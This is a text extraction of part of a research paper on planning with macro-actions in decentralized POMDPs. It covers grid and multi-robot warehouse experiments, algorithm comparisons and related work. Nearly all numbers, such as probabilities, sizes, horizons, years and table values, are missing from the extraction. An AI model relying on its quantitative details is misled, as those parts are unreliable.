figure: a two-agent namo problem, showing the goal square (g) and the boxes.

each robot can move in four directions (up, down, left and right) or use a 'push' action to attempt to move a box to a specific location (diagonally down to the left for the large box and into the corner for both small boxes). the push action fails and the robot stays in place when the robot is not in front of the box. robots can move the two small boxes by themselves, but must move the larger box together. observations are an agent's own location (but not the location of the other agent) and whether the large box or the same-numbered box has been moved (i.e., agent 1 can observe box 1 and agent 2 can observe box 2). there is noise in both navigation and box movement: movement is successful with probability . , and pushing the small and large boxes is successful with probability . and . , respectively. to encourage the robots to reach the goal as quickly as possible, there is a negative reward (- ) when any agent is not in the goal square. four options were defined for each agent. these consisted of 1) moving to a designated location to push the big box, 2) attempting to push the large box, 3) pushing the designated small box (box 1 for agent 1 and box 2 for agent 2) to the corner square, and 4) moving to the goal. the option of moving to the goal is only valid when at least one box has been moved, and movement of any box is only valid if the large box and the agent's designated box have not yet been moved. movement options terminate at the desired location, and pushing options terminate with the box successfully or unsuccessfully moved. macro-observations were the same as primitive observations (the agent's location and box movements). these options provide high-level choices for the agents to coordinate on this problem, while abstracting away the navigation tasks to option execution. options for just moving to the small boxes could also be incorporated, but were deemed unnecessary because coordination is unnecessary for pushing the small boxes. results for option-based dynamic programming are given in the figure below.

figure: value and time results for o-dp in the two-agent namo problem for various size grids (where size is the length of a single side).

here, o-dp performs very well on a range of different problem sizes and horizons. because negative reward is given until both agents are in the goal square, more steps are required to reach the goal as the problem size increases. the agents will stay in the goal upon reaching it, causing the value to plateau. as shown in the top figure, o-dp is able to produce this policy for the different problem sizes and horizons. the running times for each of the grid sizes are shown in the bottom figure for a fixed horizon. here, we see that the running time increases for larger state spaces but the growth is sublinear. a comparison with other dec-pomdp algorithms (including o-mbdp) is shown in the table. for tbdp and gmaa*-ice (a leading optimal dec-pomdp algorithm) (oliehoek et al., ), the grid size was increased while at least a short horizon could be solved, and then the horizon was increased until it reached .
results for these algorithms were provided by personal communication with the authors and were run on other machines, but the trends remain the same. for o-mbdp, trees were used because smaller numbers resulted in poor performance, but parameters were not exhaustively evaluated. the results show that tbdp is able to solve the smallest problem, but runs out of memory when trying to solve any larger ones. gmaa*-ice can solve larger problem sizes, but runs out of memory for larger horizons. gmaa*-ice scales better with the increased state space because it is able to exploit the factorization of the problem, but is limited to very small horizons because it is solving the underlying dec-pomdp optimally. (larger problem sizes were not tested for gmaa*-ice, but some may be solvable; note that for larger problems longer horizons are not solvable and the running time is already high.) the inability of current approaches to solve these problems is not surprising given their size. by contrast, o-dp is able to solve a problem with millions of states, while o-mbdp solves an even larger problem. o-mbdp is able to solve larger problems still, but we did not analyze its performance beyond that point.

table: largest representative namo problems solvable by each approach. for gmaa*-ice and tbdp, the problem size was increased until the horizon was not solvable.

figure: the multi-robot warehouse domain with depots and robots labeled.

. multi-robot experiments

we also tested our methods in a warehousing scenario using a collection of irobot creates (shown in the figure above), where we varied the communication capabilities available to the robots. the results demonstrate that our methods can automatically generate the appropriate motion and communication behavior while considering uncertainty over outcomes, sensor information and other robots.

. . the warehouse domain

we consider three robots in a warehouse that are tasked with finding and retrieving boxes of two different sizes: large and small. robots can navigate to known depot locations (rooms) to retrieve boxes and bring them back to a designated drop-off area. the larger boxes can only be moved effectively by two robots (if a robot tries to pick up the large box by itself, it will move to the box, but fail to pick it up). while the locations of the depots are known, the contents (the number and type of boxes) are unknown. in our implementation, we assumed there were three boxes (one large and two small), each of which was equally likely to be in one of two depots. our planner generates a smach controller for each of the robots off-line using our option-based algorithms. these controllers are then executed online in a decentralized manner. in each scenario, we assumed that each robot could observe its own location, see other robots if they were within (approximately) one meter, observe the nearest box when in a depot, and observe the size of the box if it is holding one (defining the resulting macro-observations). in the simulator used by the planner to evaluate solutions, the resulting state space includes the location of each robot (discretized into nine possible locations) and the location of each of the boxes (in a particular depot, with a particular robot or at the goal).
in particular, there are $\prod_{i \in I} |loc^{ag}_i| \times \prod_{b \in B} |loc^{box}_b|$ states, where $loc^{ag}_i$ is the location of agent $i$, discretized to a grid, and $loc^{box}_b$ represents the location of box $b$ (at a depot, with a robot, at a goal, or with a pair of robots); the number of possible locations for each box is numdepots + numagents + numgoals + numagents × numagents, where we set numdepots = , numagents = and numgoals = . the primitive actions are to move in four different directions as well as pickup, drop and communication actions. the macro-actions and macro-observations vary a bit for each scenario, but are detailed in the sections below. note that this primitive state and action representation is used for evaluation purposes and is not actually implemented on the robots (which just utilize the smach controllers). higher-fidelity simulators could also be used, but running time may increase if the simulations are computationally intensive (average solution times for the policies presented below were approximately one hour). the three-robot version of this scenario has a state space several orders of magnitude larger than problems typically solvable by dec-pomdp approaches. (our state representation technically has even more states, since we also include the observations of each agent in the state space.) these problems are solved using the option-based mbdp algorithm initialized with a hand-coded heuristic policy. navigation has a small amount of noise in the amount of time required to move to locations (reflecting the real-world dynamics): this noise increases when the robots are pushing the large box (reflecting the need for slower movements and turns in this case). specifically, the robots were assumed to transition to the desired square deterministically with no boxes, with probability . with the small box, and with probability . with the large box. picking up boxes and dropping them was assumed to be deterministic. (these parameters and controllers were loosely based on the actual robot navigation and box pushing; other work has looked at more directly determining these models and parameters (amato, konidaris, anders, cruz, how, & kaelbling, ; omidshafiei et al., ).) these noise parameters were assumed to be known in this work, but they could also be learned by executing macro-actions multiple times in the given initiation sets. note that the macdec-pomdp framework is very general, so other types of macro-actions and observations could also be used (including observation of other failures). more details about each scenario are given below.

. . scenario 1: no communication

in the first scenario, the robots cannot communicate with each other. therefore, all cooperation is based on the controllers that are generated by the planner (which were generated offline) and observations of the other robots (when executing online). the macro-actions were: go to depot 1, go to depot 2, go to the drop-off area, pick up the small box, pick up the large box, and drop off a box.
figure: scenario 1 (no communication). (a) two robots set out for different depots. (b) the robots observe boxes in the depots (large on left, small on right). (c) the white robot moves to the large box and the green robot moves to the small one. (d) the white robot waits at the large box while the green robot pushes the small box. (e) the green robot drops the box off at the goal. (f) the green robot goes to the other depot and sees the other robot and the large box. (g) the green robot moves to help the white robot. (h) the green robot moves to the box and the two robots push it back to the goal.

the depot macro-actions are applicable anywhere and terminate when the robot is within the walls of the appropriate depot. the drop-off and drop macro-actions are only applicable if the robot is holding a box, and the pickup macro-actions are only applicable when the robot observes a box. picking up the small box was assumed to succeed deterministically, but the model could easily be adjusted if the pickup mechanism is less robust. the macro-observations are the basic ones defined above: the robot can observe its own location ( discrete positions), whether there is another robot present in the location, the nearest box when in a depot (small, large or none), and the size of the box it is holding (small, large or none). the macro-actions correspond to natural choices for robot controllers. this case (seen in the scenario figure, along with a depiction of the executed policy in the policy-tree figure below) uses only two robots to more clearly show the optimized behavior in the absence of communication. the robots begin in the drop-off area, and the policy generated by the planner begins by assigning one robot to go to each of the depots (panel (a)). the robots then observe the contents of the depots they are in (panel (b)). (all videos can be seen at http://youtu.be/fguhthh-jna.)

figure: path executed in policy trees for the no-communication scenario by the white robot (left) and the green robot (right). only macro-actions executed (nodes) and observations seen are shown; observations are shown pictorially, with the box sizes (small as a square and large as a rectangle) and robots (white create) given along the corresponding edge. the macro-actions are d1 = depot 1, d2 = depot 2, g = goal (drop-off area), ps = pick up small box, pl = pick up large box, and dr = drop box.

if there is only one robot in a depot and there is a small box to push, the robot will push the small box (panels (c) and (d)). if the robot is in a depot with a large box and no other robots, it will stay in the depot, waiting for another robot to come and help push the box (panel (d)). in this case, once the other robot is finished pushing the small box (panel (e)), it goes back to the depots to check for other boxes or robots that need help (panel (f)). when it sees another robot and the large box in the depot on the left, it attempts to help push the large box (panel (g)), and the two robots are successful in pushing the large box to the goal (panel (h)). the planner has automatically derived a strategy for dynamic task allocation: robots go to different rooms, and then search for help needed after pushing any available boxes. this behavior was generated by an optimization process that considered the different costs of actions and the uncertainty involved (in the current step and into the future) and used those values to tailor the behavior to the particular problem instance.
figure: scenario 2 (limited communication). (a) the three robots begin moving to the waiting room. (b) one robot goes to one depot and two robots go to the other; the lone robot sees a large box. (c) the robot that saw the large box moves to the waiting room while the other robots push the small boxes. (d) that robot waits while the other robots push the small boxes. (e) the two robots drop off the small boxes at the goal while the other robot waits. (f) the green robot goes to the waiting room to check for signals and the white robot sends a signal. (g) the signal is interpreted as a need for help, so the robots move to the depot with the large box and push it. (h) the two robots push the large box back to the goal.

. . scenario 2: local communication

in scenario 2, robots can communicate when they are within one meter of each other. the macro-actions are the same as above, but we added ones to communicate and to wait for communication. the resulting macro-action set is: go to depot 1, go to depot 2, go to the drop-off area, pick up the small box, pick up the large box, drop off a box, go to an area between the depots (the "waiting room"), send signal #1, send signal #2, and wait in the waiting room for another robot. here, we allow the robots to choose to go to a "waiting room" which is between the two depots. this permits the robots to possibly communicate or receive communications before committing to one of the depots. the waiting-room macro-action is applicable in any situation and terminates when the robot is between the waiting-room walls. the depot macro-actions are now only applicable in the waiting room, while the drop-off, pickup and drop macro-actions remain the same. the wait macro-action is applicable in the waiting room and terminates when the robot observes another robot in the waiting room. the signaling macro-actions are applicable in the waiting room and are observable by other robots that are within approximately a meter of the signaling robot. the macro-observations are the same as in the previous scenario, but now include observations for the two signals. note that we do not specify how each communication signal should be interpreted, or when signals should be sent. the results for this three-robot domain are shown in the figure. the robots go to the waiting room (panel (a)), and then two of the robots go to one depot (the one on the right) and one robot goes to the other depot (the one on the left) (panel (b)). because there are three robots, the choice for the third robot is random, while one robot will always be assigned to each of the depots. because there is only a large box to push in the left depot, the robot in this depot goes back to the waiting room to try to find another robot to help it push the box (panel (c)). the robots in the right depot see two small boxes and choose to push these back to the goal (panel (d)). once the small boxes are dropped off (panel (e)), one of the robots returns to the waiting room and is then recruited by the other robot to push the large box back to the goal (panels (f) and (g)). the robots then successfully push the large box back to the goal (panel (h)). in this case, the planning process determines how the signals should be used to perform communication.

. . scenario 3: global communication

in the last scenario, the robots can use signaling (rather than direct communication). in this case, there is a switch in each of the depots that can turn on a blue or red light. this light can be seen in the waiting room, and there is another light switch in the waiting room that can turn off the light. (the light and switch were simulated in software and not incorporated in the physical domain.)
the macro-actions were: go to depot , go to depot , go to the drop-off area, pick up the small box, pick up the large box, drop off a box, go to the "waiting room", turn on a blue light, turn on a red light, and turn off the light. the first seven macro-actions are the same as for the communication case, except that we relaxed the assumption that the robots had to go to the waiting room before going to the depots (making both the depot and waiting room macro-actions applicable anywhere). the macro-actions for turning the lights on are applicable in the depots and the macro-actions for turning the lights off are applicable in the waiting room. the macro-observations are the same as in the previous scenario, but the two signals are now the lights instead of the communication signals. while the lights were intended to signal requests for help in each of the depots, we did not assign a particular color to a particular depot. in fact, we did not assign them any meaning at all, allowing the planner to set them in any way that improves performance.

the results are shown in figure .

[figure : scenario (signaling). (a) one robot starts first and goes to depot while the other robots go to the waiting room. (b) the robot in depot sees a large box, so it turns on the red light (the light is not shown). (c) the green robot sees the light first, turns it off, and goes to depot . the white robot goes to depot . (d) robots in depot move to the large box, while the robot in depot begins pushing the small box. (e) robots in depot begin pushing the large box and the robot in depot pushes a small box to the goal. (f) the robots from depot successfully push the large box to the goal.]

because one robot started ahead of the others, it was able to go to depot to sense the size of the boxes while the other robots went to the waiting room (figure (a)). the robot in depot turned on the light (red in this case, but not shown in the images) to signify that there is a large box and assistance is needed (figure (b)). the green robot (the first other robot to reach the waiting room) sees this light, interprets it as a need for help in depot , and turns off the light (figure (c)). the other robot arrives in the waiting room, does not observe a light on, and moves to depot (also figure (c)). the robot in depot chooses to push a small box back to the goal and the green robot moves to depot to help the other robot (figure (d)). one robot then pushes the small box back to the goal while the two robots in depot begin pushing the large box (figure (e)). finally, the two robots in depot push the large box back to the goal (figure (f)). this behavior is optimized based on the information given to the planner. the semantics of all these signals as well as the movement and signaling decisions were decided on by the planning algorithm to maximize value.

. . simulation results
we also ran the multi-robot experiments in the simulator to evaluate the difference in performance between option-based mbdp (o-mbdp) and option-based direct cross entropy policy search (o-dice). option-based dynamic programming is not scalable enough to solve the domains to the horizons considered. for o-mbdp, maxtrees = , which was chosen to balance solution quality and running time. for o-dice, iter = , n = , nb = , and α = . , which were chosen based on suggestions from the original work (oliehoek et al., ).
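for readers unfamiliar with direct cross entropy policy search, the sketch below illustrates the general scheme in the spirit of o-dice: a sampling distribution over macro-actions is kept at each decision point, candidate policies are sampled and evaluated in the simulator, and the distributions are refit toward the best samples with learning rate α. this is a simplified illustration under our own assumptions (the parameter names, default values, and the flat list of decision points are placeholders), not the implementation evaluated here.

```python
# Simplified cross-entropy search over macro-action choices (illustrative only).
import random
from typing import Callable, Dict, List, Tuple

def cross_entropy_policy_search(
    decision_points: List[Tuple[int, int]],   # e.g., (agent id, policy-tree node id)
    macro_actions: List[str],                 # available macro-actions
    evaluate: Callable[[Dict[Tuple[int, int], str]], float],  # simulator-based policy value
    iterations: int = 50,
    num_samples: int = 40,    # sampled joint policies per iteration ("n")
    num_best: int = 5,        # elite samples kept ("nb")
    alpha: float = 0.2,       # learning rate for refitting the distributions
) -> Dict[Tuple[int, int], str]:
    # one categorical sampling distribution per decision point
    dist = {dp: [1.0 / len(macro_actions)] * len(macro_actions) for dp in decision_points}
    best_policy, best_value = None, float("-inf")
    for _ in range(iterations):
        samples = []
        for _ in range(num_samples):
            policy = {dp: random.choices(macro_actions, weights=dist[dp])[0] for dp in decision_points}
            value = evaluate(policy)
            samples.append((value, policy))
            if value > best_value:
                best_value, best_policy = value, policy
        # refit each distribution toward the frequencies observed in the elite set
        elite = [p for _, p in sorted(samples, key=lambda vp: vp[0], reverse=True)[:num_best]]
        for dp in decision_points:
            counts = [sum(p[dp] == a for p in elite) / len(elite) for a in macro_actions]
            dist[dp] = [(1 - alpha) * old + alpha * new for old, new in zip(dist[dp], counts)]
    return best_policy
```

sharing a single distribution across all decision points, rather than one per node, gives the simpler variant discussed next.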
a version of o-dice was also implemented that, rather than maintaining sampling distributions for the whole tree, only maintains a single sampling distribution that is used at each node in the tree. this latter version of o-dice is referred to as o-dice ( ) and can be thought of as a biased form of monte carlo sampling.

as can be seen in table , o-dice outperforms o-mbdp in terms of both value and time.

[table : multi-robot warehouse simulation results for option-based mbdp (o-mbdp) and option-based direct cross entropy search (o-dice) using parameters for full histories (full) or just a single value ( ). rows report results by horizon for the no communication, communication, and signaling scenarios; columns report value and time (s) for o-mbdp( ), o-dice ( ), and o-dice (full). a − entry signifies that the algorithm ran out of memory before generating any valid solution and a ∗ entry signifies that the algorithm ran out of memory before completion.]

in all cases, versions of o-dice are more scalable than o-mbdp, even though only trees were used for o-mbdp. for problems in which both o-mbdp and o-dice could produce solutions, the values were very similar, but the o-dice methods required significantly less time. o-mbdp either runs out of memory (due to the large number of trees generated during a backup step) or takes a very long time to generate the maxtrees trees. using more efficient versions of mbdp (e.g., wu et al., a) should improve performance, but performance improvements could also be made to o-dice. an extensive comparison has not been conducted between these algorithms even for primitive-action dec-pomdp domains, but we expect that performance will depend on the domain and parameters used (e.g., heuristics in mbdp). the full version of o-dice was able to outperform the single-parameter version of o-dice in terms of value, but also required more time.

. . infinite horizon comparisons
unlike pomdps, dec-pomdp finite-horizon methods are typically not scalable enough to solve large or infinite-horizon problems. as a consequence, special-purpose infinite-horizon methods have been developed which typically use a finite-state controller policy representation instead of a policy tree. the finite-state controller allows memory to be bounded. as a consequence, finite-state controller-based methods are typically more scalable for large-horizon problems, but perform poorly for smaller horizons. finite-state controllers, which condition action selection on an internal memory state, have been widely used in dec-pomdps (bernstein et al., ; amato, bernstein, & zilberstein, a; amato, bonet, & zilberstein, b; pajarinen & peltonen, ; wu et al., ; kumar, zilberstein, & toussaint, ; kumar, mostafa, & zilberstein, ). finite-state controllers operate in the same way as policy trees in that there is a designated initial node and, following action selection at that node, the controller transitions to the next node depending on the observation seen. this continues for the infinite steps of the problem.
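the following minimal sketch (illustrative only; the node labels, actions, and observations are made up) shows how such a controller executes: an action is selected at the current node, and the observation received selects the next node, so memory is bounded by the fixed number of nodes regardless of the horizon.

```python
# Minimal finite-state controller policy (illustrative example).
from typing import Dict, Hashable, Tuple

class FiniteStateController:
    def __init__(self,
                 action_at_node: Dict[int, str],
                 next_node: Dict[Tuple[int, Hashable], int],
                 initial_node: int = 0):
        self.action_at_node = action_at_node  # node -> (macro-)action to execute
        self.next_node = next_node            # (node, observation) -> next node
        self.node = initial_node              # designated initial node

    def step(self, observation: Hashable = None) -> str:
        # After the first step, transition on the observation seen, then act.
        if observation is not None:
            self.node = self.next_node[(self.node, observation)]
        return self.action_at_node[self.node]

# Usage: a two-node controller for one agent that keeps pushing while it
# observes a box and otherwise goes back to search a depot.
fsc = FiniteStateController(
    action_at_node={0: "go_to_depot1", 1: "push_box"},
    next_node={(0, "box"): 1, (0, "none"): 0, (1, "box"): 1, (1, "none"): 0},
)
first_action = fsc.step()                  # action from the initial node
next_action = fsc.step(observation="box")  # transition on the observation, then act
```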
finite-state controllers explicitly represent infinite-horizon policies, but can also be used for finite-horizon policies. recently, we and others have extended the ideas of macro-actions from this paper to use finite-state controller representations. in particular, heuristic search (amato et al., ) and a dice-based approach (omidshafiei et al., ) have been explored. g-dice (omidshafiei et al., ) is the same as o-dice except that it is applied to the finite-state controller representation rather than the tree. the heuristic search method from amato et al. ( ) is similar to multi-agent a* approaches (oliehoek et al., ; szer, charpillet, & zilberstein, ; oliehoek, spaan, & vlassis, ; oliehoek, whiteson, & spaan, ), but again is applied to the finite-state controller representation rather than the tree. it is worth noting that the key difference is the policy representation: the algorithms in this paper could be applied to finite-state controllers, and many finite-state controller-based methods could be applied to trees. this paper introduces macro-actions in dec-pomdps and explores some initial algorithms for tree-based solutions; many future algorithms are now possible.

nevertheless, for thoroughness of results, we provide the performance of the heuristic search method mdhs (amato et al., ) on our benchmark problems. mdhs is an anytime algorithm, so it will continue to improve until the best parameters for the given controller size are found. for a fair comparison, we let it run for the same amount of time as the full version of o-dice. we set the parameters in the same way as the previous work (amato et al., ) (e.g., controller nodes were used) and the initial lower bound was found from the best of random controller parameterizations. reporting results for all horizons of all domains becomes redundant, but the results we provide are representative of the other domains and horizon values.

[table : results for the controller-based mdhs method on our benchmark problems (meeting in a grid, namo, and the robot warehouse scenarios), along with its performance relative to o-dice (full). for each problem and horizon, the table reports the mdhs value and the percentage of the corresponding o-dice value it attains.]

as can be seen in table , mdhs often achieves values that are similar to the o-dice values, but sometimes significantly underperforms the other method. for instance, mdhs can only achieve % of the o-dice value in the meeting in a grid problem with agents, % of the o-dice value is produced in the horizon robot warehouse problem with signaling, and % and % of the o-dice value is produced in the horizon and warehouse problems with communication. the values for the namo problems are not particularly interesting, as all policies have the same value until the horizon becomes significantly longer than the domain size (since the agent requires more steps to reach the goal as the domain size increases), but we still see that mdhs does not achieve the full o-dice values for non-degenerate horizons.
in general, mdhs is more scalable in terms of the horizon (e.g., solving the horizon robot warehouse problem with communication), but scalability depends on choosing a proper controller size to balance solution quality and computational efficiency. as a result, controller-based methods, such as mdhs, can return lower-quality solutions on horizons that are solvable by the tree-based methods. mdhs will also require an intractable amount of time to improve solutions as the number of observations grows, since it searches for assignments for all possible next observations in the controller (omidshafiei et al., ). as is currently the case in (primitive) dec-pomdps, tree-based and controller-based algorithms both have their place in macro-action-based dec-pomdps. the performance of mdhs (or controller-based methods more generally) relative to tree-based methods is very problem and horizon dependent (as seen in our results). a general rule of thumb may be to use a tree-based method for finite-horizon problems that are solvable and to use controller-based (or other) methods otherwise.

. related work
while many hierarchical approaches have been developed for multi-agent systems (horling & lesser, ), very few are applicable to multi-agent models based on mdps and pomdps. perhaps the most similar approach is that of ghavamzadeh, mahadevan, and makar ( ). this is a multi-agent reinforcement learning approach with a given task hierarchy, where communication is used to coordinate actions at higher levels and agents are assumed to be independent at lower levels. this work was limited to a multi-agent mdp model with (potentially costly) communication, making the learning problem challenging, but the planning problem is simpler than the full dec-pomdp case.

other approaches have considered identifying and exploiting independence between agents to limit reasoning about coordination and improve scalability. approaches include general assumptions about agent independence, like transition-independent dec-mdps (becker, zilberstein, lesser, & goldman, b), and factored models such as nd-pomdps (nair et al., ), as well as methods that consider coordination based on 'events' or states. events which may require or allow interaction have been explored in dec-mdps (becker, lesser, & zilberstein, a) and (centralized) multi-robot systems (messias, spaan, & lima, ). other methods have considered locations or states where interaction is needed to improve scalability in planning (spaan & melo, ; velagapudi et al., ) and learning (melo & veloso, ).

the work on independence assumes agents are always independent or coordinate using a fixed factorization, making it less general than an option-based approach. the work on event- and state-based coordination focuses on a different type of domain knowledge: knowledge of states where coordination takes place. while this type of knowledge may be available, it may be easier to obtain and utilize procedural knowledge. the domain may therefore be easier to specify using macro-actions with different properties (such as independence or tight coordination), allowing planning to determine the necessary states for coordination. furthermore, this type of state information could be used to define options for reaching these coordination points. lastly, macro-actions could possibly be used in conjunction with previous methods, further improving scalability.
as mentioned in the introduction, we do not target scalability with respect to the number of agents. several such methods have been developed that make various assumptions about agent abilities and policies (e.g., sonu, chen, & doshi, ; varakantham, adulyasak, & jaillet, ; velagapudi et al., ; oliehoek et al., ; nguyen, kumar, & lau, a, b). macro-action-based methods could potentially be incorporated into these methods to again increase scalability in terms of the number of agents as well as the horizon and other problem variables.

there are several frameworks for multi-robot decision making in complex domains. for instance, behavioral methods have been studied for performing task allocation over time with loosely-coupled (parker, ) or tightly-coupled (stroupe, ravichandran, & balch, ) tasks. these are heuristic in nature and make strong assumptions about the type of tasks that will be completed.

linear temporal logic (ltl) has also been used to specify robot behavior (belta, bicchi, egerstedt, frazzoli, klavins, & pappas, ; loizou & kyriakopoulos, ); from this specification, reactive controllers that are guaranteed to satisfy the specification can be derived. these methods are appropriate when the world dynamics can be effectively described non-probabilistically and when there is a useful characterization of the robot's desired behavior in terms of a set of discrete constraints. when applied to multiple robots, it is necessary to give each robot its own behavior specification. in contrast, our approach (probabilistically) models the domain and allows the planner to automatically optimize the robots' behavior.

market-based approaches use traded value to establish an optimization framework for task allocation (dias & stentz, ; gerkey & matarić, ). these approaches have been used to solve real multi-robot problems (kalra, ferguson, & stentz, ), but are largely aimed at tasks where the robots can communicate through a bidding mechanism. emery-montemerlo, gordon, schneider, and thrun ( ) introduced a (cooperative) game-theoretic formalization of multi-robot systems which resulted in solving a dec-pomdp. an approximate forward search algorithm was used to generate solutions, but because a (relatively) low-level dec-pomdp was used, scalability was limited. their system also required synchronized execution by the robots.

. discussion
we have considered local options in this paper, but our framework could support other types of options. for example, we could consider options in which the policy is local but the initiation and termination sets are not—for example, initiation and termination could depend on the agent's history, or on other agents' states. generalizing a local option in this way retains the advantages described here, because the decision about which option to execute already requires coordination but executing the option itself does not. we could also use options with history-based policies, or define multi-agent options that control a subset of agents to complete a task. in general, we expect that an option will be useful for planning when its execution allows us to temporarily ignore some aspect of the original problem.
for example, the option might be defined in a smaller state space (allowing us to ignore the full complexity of the problem), or use only observable information (allowing us to ignore the partially observable aspect of the problem), or involve a single agent or a subset of agents communicating (allowing us to ignore the decentralized aspect of the problem).

we can gain additional benefits by exploiting known structure in the multi-agent problem. for instance, most controllers only depend on locally observable information and do not require coordination. for example, consider a controller that navigates to a waypoint. only local information is required for navigation—the robot may detect other robots but their presence does not change its objective, and it simply moves around them—but choosing the target waypoint likely requires the planner to consider the locations and actions of all robots. macro-actions with independent execution allow coordination decisions to be made only when necessary (i.e., when choosing macro-actions) rather than at every time step. because macdec-pomdps are built on top of dec-pomdps, macro-action choice may depend on history, but during execution macro-actions may depend only on a single observation or on any number of steps of history, or even represent the actions of a set of robots. that is, macro-actions are very general and can be defined in such a way as to take advantage of the knowledge available to the robots during execution.

we have so far assumed that the agent is given an appropriate set of macro-actions with which to plan. in all of our domains, there were quite natural choices for macro-actions and macro-observations (e.g., navigating to depots and observing that you are in a depot along with its contents), but such natural representations are not always present. research on skill discovery (mcgovern & barto, ) has attempted to devise methods by which a single agent can instead acquire an appropriate set of options autonomously, through interaction with its (fully observable) environment. while some of these methods may be directly applicable, the characteristics of the partially observable, multi-agent case also offer new opportunities for skill discovery. for example, we may wish to synthesize skills that collapse uncertainty across multiple agents, perform coordinated multi-agent actions, communicate essential state information, or allow agents to synchronize and replan. related work has begun to explore some of these topics (omidshafiei et al., , a), but many open questions remain.

in terms of multi-robot domains, we demonstrated macro-action-based approaches on multiple other domains with limited sensing and communication. these other domains included a logistics (beer delivery) domain, where two robots must efficiently find out about and service beer orders in cooperation with a 'picker/bartender' robot, which can retrieve items (amato, konidaris, anders, cruz, how, & kaelbling, ; amato et al., ); a package delivery domain, where a group of aerial robots must retrieve and deliver packages from base locations to delivery locations while dealing with limited battery life (omidshafiei, agha-mohammadi, amato, & how, ; omidshafiei, agha-mohammadi, amato, liu, how, & vian, ; omidshafiei et al., a, ); as well as an adversarial domain in which a team of robots plays capture the flag against another team of robots (hoang, xiao, sivakumar, amato, & how, ).
also, our results have shown that the use of macro-actions can significantly improve scalability—for example, by allowing us to use larger grids with the same set of agents and obstacles in the namo problem (see figure ). however, in such cases—where the state space grows but the number of agents and significant interactions do not—we should in principle be able to deal with a grid of any size with no increase in computation time, because the size of the grid is irrelevant to the coordination aspects of the problem. this does not occur in the work presented here because we plan in the original state space; methods for constructing a more abstract task-level representation (konidaris, kaelbling, & lozano-perez, ) could provide further performance improvements.

it is also worth noting that our approach can incorporate state-of-the-art methods for solving more restricted scenarios as options. the widespread use of techniques for solving restricted robotics scenarios has led to a plethora of usable algorithms for specific problems, but no way to combine these in more complex scenarios. our approach can build on the large amount of research in single and multi-robot systems that has gone into solving difficult problems such as navigation in a formation (balch & arkin, ), cooperative transport of an object (kube & bonabeau, ), coordination with signaling (beckers, holland, & deneubourg, ) or communication under various limitations (rekleitis, lee-shue, new, & choset, ). the solutions to these problems could be represented as macro-actions in our framework, building on existing research to solve even more complex multi-robot problems.

this paper focused on (sample-based) planning using macro-actions, but learning could also be used to generate policies over macro-actions. in particular, other work developed a method that learns policies using only high-level macro-action trajectories (macro-actions and macro-observations) (liu, amato, anesta, griffith, & how, ). as a result, the methods do not need any models and are applicable in cases where data is difficult or costly to obtain (e.g., human demonstrations, elaborate training exercises). our experiments showed that the methods can also produce very high-quality solutions, even outperforming and improving upon hand-coded 'expert' solutions with a small amount of data. we also improved upon and tested these approaches in a multi-robot search and rescue problem (liu, sivakumar, omidshafiei, amato, & how, ). in general, using macro-actions with other multi-agent reinforcement learning methods (including popular deep methods, e.g., foerster, assael, de freitas, & whiteson, ; omidshafiei, pazis, amato, how, & vian, b; lowe, wu, tamar, harb, abbeel, & mordatch, ; rashid, samvelyan, schroeder, farquhar, foerster, & whiteson, ; palmer, tuyls, bloembergen, & savani, ; omidshafiei, kim, liu, tesauro, riemer, amato, campbell, & how, ) could be a promising way of improving performance, while allowing asynchronous action execution.

finally, while this paper focused on dynamic programming (hansen et al., ; seuken & zilberstein, b) and direct policy search methods (oliehoek et al., ), forward search methods (oliehoek et al., ; szer et al., ; oliehoek et al., , ; dibangoye et al., ) are likely to perform well when using macdec-pomdps. when building up policies from the last step, as in dynamic programming, adding macro-actions to the beginning of a tree changes when the macro-actions deeper down the tree will be completed.
in forward search methods, actions are added to the leaves of the tree, leaving the completion times for previous macro-actions in the policy (those at earlier heights) the same. we have not explored such search methods for macdec-pomdps, but they appear to be promising.

. conclusion
we presented a new formulation for representing decentralized decision-making problems under uncertainty using higher-level macro-actions (modeled as options), rather than primitive (single-step) actions. we called this framework the macro-action dec-pomdp (macdec-pomdp). because our macro-action model is built on top of the dec-pomdp framework, dec-pomdp algorithms can be extended to solve problems with macro-actions while retaining agent coordination. we focused on local options, which allow us to reason about coordination only when deciding which option to execute. our results have demonstrated that high-quality results can be achieved on current benchmarks, and that very large problems can be effectively modeled and solved this way. as such, our macro-action framework represents a promising approach for scaling multi-agent planning under uncertainty to real-world problem sizes.

we have also demonstrated that complex multi-robot domains can be solved with dec-pomdp-based methods. the macdec-pomdp model is expressive enough to capture multi-robot systems of interest, but also simple enough to be feasible to solve in practice. our results show that a general-purpose macdec-pomdp planner can generate cooperative behavior for complex multi-robot domains, with task allocation, direct communication, and signaling behavior emerging automatically as properties of the solution for the given problem model. because all cooperative multi-robot problems can be modeled as dec-pomdps, macdec-pomdps represent a powerful tool for automatically trading off various costs, such as time, resource usage and communication, while considering uncertainty in the dynamics, sensors and other robot information. these approaches have great potential to lead to automated solution methods for general probabilistic multi-robot coordination problems with heterogeneous robots in complex, uncertain domains.

more generally, this work opens the door to many research questions about representing and solving multi-agent problems hierarchically. promising avenues for future work include exploring different types of options, further work on reinforcement learning for either generating options or policies over options, and developing more scalable solution methods that exploit domain and hierarchical structure. one example of such structure would be the use of a factored reward function (nair et al., ), which allows more efficient policy generation and evaluation.

acknowledgements
we would like to thank matthijs spaan and feng wu for providing results, as well as ari anders, gabriel cruz, and christopher maynor for their help with the robot experiments. research supported in part by nsf project # , onr muri project #n , darpa yfa d ap , afosr yip fa - - - , and nih r mh .

references
amato, c., bernstein, d. s., & zilberstein, s. ( a). optimizing fixed-size stochastic controllers for pomdps and decentralized pomdps. journal of autonomous agents and multi-agent systems, ( ), – . amato, c., bonet, b., & zilberstein, s. ( b). finite-state controllers based on mealy machines for centralized and decentralized pomdps.
